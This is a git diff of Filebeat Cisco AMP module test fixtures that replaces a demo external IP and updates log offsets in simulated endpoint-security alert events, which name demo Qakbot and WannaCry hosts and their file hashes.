+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
index cfde9b3e31be..a2f6a597836e 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -46,7 +46,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -58,7 +58,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -96,7 +96,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 1186,
+        "log.offset": 1191,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -105,7 +105,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -121,7 +121,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -159,7 +159,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 2465,
+        "log.offset": 2475,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -168,7 +168,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -184,7 +184,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -224,7 +224,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 3738,
+        "log.offset": 3753,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -235,7 +235,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -251,7 +251,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -291,7 +291,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 5108,
+        "log.offset": 5128,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -302,7 +302,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -318,7 +318,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -350,7 +350,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 6470,
+        "log.offset": 6495,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -359,7 +359,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -371,7 +371,7 @@
         "@timestamp": "2021-01-14T12:57:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -405,7 +405,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 7590,
+        "log.offset": 7620,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -414,7 +414,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -426,7 +426,7 @@
         "@timestamp": "2021-01-14T12:57:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -458,7 +458,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 8772,
+        "log.offset": 8807,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -467,7 +467,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -479,7 +479,7 @@
         "@timestamp": "2021-01-14T12:57:45.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -519,7 +519,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 9881,
+        "log.offset": 9921,
         "related.hash": [
             "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12",
             "a97fb86da4e010974860e5024137b56b",
@@ -530,7 +530,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -546,7 +546,7 @@
         "@timestamp": "2021-01-14T12:32:14.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -584,7 +584,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 11257,
+        "log.offset": 11302,
         "related.hash": [
             "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
         ],
@@ -593,7 +593,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -605,7 +605,7 @@
         "@timestamp": "2021-01-14T12:32:14.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -643,7 +643,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 12514,
+        "log.offset": 12564,
         "related.hash": [
             "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
         ],
@@ -652,7 +652,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -666,7 +666,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -701,7 +701,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 13751,
+        "log.offset": 13806,
         "process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75",
         "related.hash": [
             "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
@@ -711,7 +711,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -723,7 +723,7 @@
         "@timestamp": "2021-01-14T12:27:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -756,7 +756,7 @@
         "host.hostname": "Demo_Low_Prev_Retro",
         "host.name": "Demo_Low_Prev_Retro",
         "input.type": "log",
-        "log.offset": 15508,
+        "log.offset": 15568,
         "related.hash": [
             "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
         ],
@@ -765,7 +765,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -777,7 +777,7 @@
         "@timestamp": "2021-01-14T12:19:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -803,13 +803,13 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 16640,
+        "log.offset": 16705,
         "related.hosts": [
             "Demo_AMP_MAP_FriedEx"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -821,7 +821,7 @@
         "@timestamp": "2021-01-14T12:11:04.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -859,7 +859,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 17570,
+        "log.offset": 17640,
         "related.hash": [
             "48a0bf05b9706a00d2a0ff6260412f11",
             "5058b16a86beee96927371210b9a9f682976a50a",
@@ -870,7 +870,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -882,7 +882,7 @@
         "@timestamp": "2021-01-14T12:02:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -923,7 +923,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 18818,
+        "log.offset": 18893,
         "process.hash.md5": "045451fa238a75305cc26ac982472367",
         "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316",
         "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97",
@@ -939,7 +939,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -955,7 +955,7 @@
         "@timestamp": "2021-01-14T12:02:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -987,7 +987,7 @@
         "host.hostname": "Demo_Qakbot_2",
         "host.name": "Demo_Qakbot_2",
         "input.type": "log",
-        "log.offset": 20427,
+        "log.offset": 20507,
         "related.hash": [
             "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"
         ],
@@ -996,7 +996,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1008,7 +1008,7 @@
         "@timestamp": "2021-01-14T11:58:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1042,7 +1042,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 21536,
+        "log.offset": 21621,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1051,7 +1051,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1063,7 +1063,7 @@
         "@timestamp": "2021-01-14T11:58:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1102,7 +1102,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 22729,
+        "log.offset": 22819,
         "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
         "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -1116,7 +1116,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1132,7 +1132,7 @@
         "@timestamp": "2021-01-14T11:58:54.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1173,7 +1173,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 24252,
+        "log.offset": 24347,
         "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
         "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -1189,7 +1189,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1205,7 +1205,7 @@
         "@timestamp": "2021-01-14T11:58:54.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1237,7 +1237,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 25859,
+        "log.offset": 25959,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1246,7 +1246,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1258,7 +1258,7 @@
         "@timestamp": "2021-01-14T11:49:08.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1284,13 +1284,13 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 26979,
+        "log.offset": 27084,
         "related.hosts": [
             "Demo_AMP_MAP_FriedEx"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1302,7 +1302,7 @@
         "@timestamp": "2021-01-14T11:41:12.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1336,7 +1336,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 27909,
+        "log.offset": 28019,
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
@@ -1346,7 +1346,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1358,7 +1358,7 @@
         "@timestamp": "2021-01-14T11:41:12.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1392,7 +1392,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 29220,
+        "log.offset": 29335,
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
@@ -1402,7 +1402,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1414,7 +1414,7 @@
         "@timestamp": "2021-01-14T11:28:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1446,7 +1446,7 @@
         "host.hostname": "Demo_AMP_Exploit_Prevention_Audit",
         "host.name": "Demo_AMP_Exploit_Prevention_Audit",
         "input.type": "log",
-        "log.offset": 30538,
+        "log.offset": 30658,
         "related.hash": [
             "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"
         ],
@@ -1455,7 +1455,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1467,7 +1467,7 @@
         "@timestamp": "2021-01-14T11:28:45.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1507,7 +1507,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 31671,
+        "log.offset": 31796,
         "related.hash": [
             "5df0c4ebca109779dc8afc745d612637",
             "bdb11107a33eaeded6a838eb2a0e6167637dbe9c",
@@ -1518,7 +1518,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1530,7 +1530,7 @@
         "@timestamp": "2021-01-14T11:26:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1564,7 +1564,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 32991,
+        "log.offset": 33121,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1573,7 +1573,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1585,7 +1585,7 @@
         "@timestamp": "2021-01-14T11:26:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1623,7 +1623,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 34184,
+        "log.offset": 34319,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1632,7 +1632,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1648,7 +1648,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1682,7 +1682,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 35457,
+        "log.offset": 35597,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1691,7 +1691,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1703,7 +1703,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1737,7 +1737,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 36650,
+        "log.offset": 36795,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1746,7 +1746,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1758,7 +1758,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
